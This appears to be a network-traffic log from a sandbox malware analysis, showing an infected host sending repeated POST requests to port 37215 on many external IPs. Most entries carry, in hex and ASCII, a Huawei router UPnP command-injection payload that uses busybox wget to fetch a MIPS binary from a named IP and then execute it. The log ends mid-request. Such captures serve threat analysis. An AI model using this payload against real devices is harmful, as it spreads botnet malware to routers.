                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    81192.168.2.2349302197.161.10.6537215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804522038 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    82192.168.2.2353770197.95.113.21137215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804600954 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    83192.168.2.2341410156.67.96.7037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804658890 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    84192.168.2.2348106197.158.151.6837215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804743052 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    85192.168.2.2355288197.79.233.8037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804816008 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    86192.168.2.2348890197.213.139.4537215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804877996 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    87192.168.2.2338648197.235.235.15437215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804970026 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    88192.168.2.2334620197.69.230.16937215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.805037022 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    89192.168.2.2342426156.92.88.23037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.805114985 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    90192.168.2.234725441.29.72.1637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.805186987 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
